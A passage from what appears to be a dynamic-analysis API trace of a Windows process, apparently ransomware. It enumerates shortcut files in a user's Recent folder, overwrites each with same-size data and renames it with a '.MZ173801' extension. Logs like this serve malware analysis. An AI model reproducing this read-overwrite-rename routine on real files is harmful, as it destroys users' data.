lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0109.410] GetCurrentThreadId () returned 0x1358 [0109.410] GetCurrentThreadId () returned 0x1358 [0109.410] GetCurrentThreadId () returned 0x1358 [0109.410] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\HzRoNmrPEEYbe.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\hzronmrpeeybe.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0109.410] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0109.410] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0109.410] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x3c9 [0109.410] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0109.410] ReadFile (in: hFile=0x3f4, lpBuffer=0x2432c60, nNumberOfBytesToRead=0x3c9, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f9b0*=0x3c9, lpOverlapped=0x0) returned 1 [0109.411] CloseHandle (hObject=0x3f4) returned 1 [0109.411] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\HzRoNmrPEEYbe.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\hzronmrpeeybe.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0109.412] WriteFile (in: hFile=0x3f4, lpBuffer=0x2434c90*, nNumberOfBytesToWrite=0x3c9, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2434c90*, lpNumberOfBytesWritten=0x19f9bc*=0x3c9, lpOverlapped=0x0) returned 1 [0109.413] CloseHandle (hObject=0x3f4) returned 1 [0109.414] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\HzRoNmrPEEYbe.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\hzronmrpeeybe.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\HzRoNmrPEEYbe.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\hzronmrpeeybe.lnk.mz173801")) returned 1 [0109.414] GetCurrentThreadId () returned 0x1358 [0109.414] GetCurrentThreadId () returned 0x1358 [0109.414] GetCurrentThreadId () returned 0x1358 [0109.414] GetCurrentThreadId () returned 0x1358 [0109.414] GetCurrentThreadId () returned 0x1358 [0109.414] GetCurrentThreadId () returned 0x1358 [0109.414] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x762fcc68, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x762fcc68, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x762fcc68, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x2b0, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="If9wR_2_gcr9llsoyR.lnk", cAlternateFileName="IF9WR_~1.LNK")) returned 1 [0109.414] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0109.414] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0109.415] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\If9wR_2_gcr9llsoyR.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\if9wr_2_gcr9llsoyr.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x762fcc68, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x762fcc68, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x762fcc68, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x2b0)) returned 1 [0109.415] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0109.415] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0109.415] GetCurrentThreadId () returned 0x1358 [0109.415] GetCurrentThreadId () returned 0x1358 [0109.415] GetCurrentThreadId () returned 0x1358 [0109.416] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0109.416] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0109.416] GetCurrentThreadId () returned 0x1358 [0109.416] GetCurrentThreadId () returned 0x1358 [0109.416] GetCurrentThreadId () returned 0x1358 [0109.416] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\If9wR_2_gcr9llsoyR.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\if9wr_2_gcr9llsoyr.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0109.416] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0109.416] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0109.416] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x2b0 [0109.416] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0109.416] ReadFile (in: hFile=0x3f4, lpBuffer=0x2432c60, nNumberOfBytesToRead=0x2b0, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f9b0*=0x2b0, lpOverlapped=0x0) returned 1 [0109.417] CloseHandle (hObject=0x3f4) returned 1 [0109.417] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\If9wR_2_gcr9llsoyR.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\if9wr_2_gcr9llsoyr.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0109.418] WriteFile (in: hFile=0x3f4, lpBuffer=0x2434c90*, nNumberOfBytesToWrite=0x2b0, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2434c90*, lpNumberOfBytesWritten=0x19f9bc*=0x2b0, lpOverlapped=0x0) returned 1 [0109.419] CloseHandle (hObject=0x3f4) returned 1 [0109.470] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\If9wR_2_gcr9llsoyR.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\if9wr_2_gcr9llsoyr.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\If9wR_2_gcr9llsoyR.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\if9wr_2_gcr9llsoyr.lnk.mz173801")) returned 1 [0109.471] GetCurrentThreadId () returned 0x1358 [0109.471] GetCurrentThreadId () returned 0x1358 [0109.471] GetCurrentThreadId () returned 0x1358 [0109.471] GetCurrentThreadId () returned 0x1358 [0109.471] GetCurrentThreadId () returned 0x1358 [0109.471] GetCurrentThreadId () returned 0x1358 [0109.471] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9cfac35, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xe9cfac35, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xe9cfac35, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x3f4, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="ImYAKHvtRzfAlzW.flv.lnk", cAlternateFileName="IMYAKH~1.LNK")) returned 1 [0109.471] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0109.471] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0109.471] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ImYAKHvtRzfAlzW.flv.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\imyakhvtrzfalzw.flv.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9cfac35, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xe9cfac35, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xe9cfac35, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x3f4)) returned 1 [0109.472] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0109.472] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 